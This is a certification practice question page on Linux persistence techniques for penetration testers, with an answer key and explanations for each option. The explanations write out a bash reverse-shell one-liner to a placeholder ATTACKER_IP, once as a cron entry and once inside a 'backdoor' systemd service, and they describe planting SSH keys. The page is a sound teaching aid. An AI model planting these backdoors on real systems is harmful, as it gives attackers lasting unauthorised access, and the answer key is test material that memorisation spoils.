Courseiva
Attacks and Exploits →hardMultiple Select

PT0-002 Attacks and Exploits Practice Question

A penetration tester successfully compromises a web server and wants to establish persistence on the system. Which THREE of the following are effective persistence mechanisms on a Linux system?

Answer choices

Why each option matters

Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.

Correct answer & explanation

✓

Creating a cron job that executes a reverse shell

Cron jobs, SSH authorized_keys, and systemd services are common persistence methods on Linux. Scheduled tasks and registry Run keys are Windows-specific.

Answer analysis

Option-by-option breakdown

For each option: why learners choose it and why it is or isn't the right answer here.

  • ✗

    Adding a registry Run key

    Why it's wrong here

    Adding a registry Run key is a Windows-specific persistence mechanism. If the web server runs Linux, the registry does not exist, and this technique simply will not work. Even on a Windows target, it would require writing to HKLM\...\Run or HKCU\...\Run, and modern EDR solutions commonly monitor these locations for malicious entries. Since the correct persistence methods here are all Linux-based, this option is not valid for the compromised web server.

  • ✓

    Creating a cron job that executes a reverse shell

    Why this is correct

    Creating a cron job that executes a reverse shell is a valid Linux persistence technique. An attacker can add an entry such as `*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'` to the user's crontab or /etc/crontab, causing a reverse shell to be re-established every five minutes if it is killed. Using `@reboot` instead ensures the cron job runs once at system startup, providing persistence across reboots. This is a reliable, operational method that only requires write access to the appropriate crontab file.

  • ✓

    Adding an SSH authorized_key for remote access

    Why this is correct

    Adding an SSH authorized_key grants persistent remote access by appending the attacker's public key to ~/.ssh/authorized_keys. As long as the SSH daemon is running and the key remains in the file, the attacker can log in at any time as the compromised user, even after a reboot. This is a stealthy backdoor because it does not spawn new processes or require periodic connection attempts, making it easy to overlook for administrators who focus only on process lists. The key file must be created with the correct ownership and permissions (typically 600) for the SSH server to accept it.

  • ✗

    Creating a scheduled task via schtasks

    Why it's wrong here

    Creating a scheduled task via schtasks is the Windows counterpart to cron and is not applicable to a Linux web server. The schtasks.exe utility and the Task Scheduler service rely on Windows APIs and are absent from a typical *nix environment. Even on a Windows target, this technique is heavily monitored by EDR and often requires elevated privileges to register a task. Because the compromised web server is presumably Linux, this option does not provide valid persistence.

  • ✓

    Installing a systemd service

    Why this is correct

    Installing a systemd service is a robust Linux persistence method. The attacker creates a unit file, such as /etc/systemd/system/backdoor.service, with an ExecStart line that launches a reverse shell (e.g., `/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'`), then runs `systemctl enable backdoor.service` to start it at boot. Since systemd is the default init system on most modern Linux distributions, this technique works broadly across servers. A critical detail is that the service must be enabled, not just started, otherwise it will not survive a reboot.

About these practice questions

One of 777 original PT0-003 practice questions on Courseiva, each with a full explanation and wrong-answer analysis — not exam dumps or protected exam content. Learn why practice questions differ from exam dumps →

How Courseiva writes practice questions · Editorial policy

JA

Written by Johnson Ajibi, MSc IT Security

Senior Network & Security Engineer · founder of Courseiva

This PT0-003 practice question is part of Courseiva's free CompTIA certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the PT0-003 exam.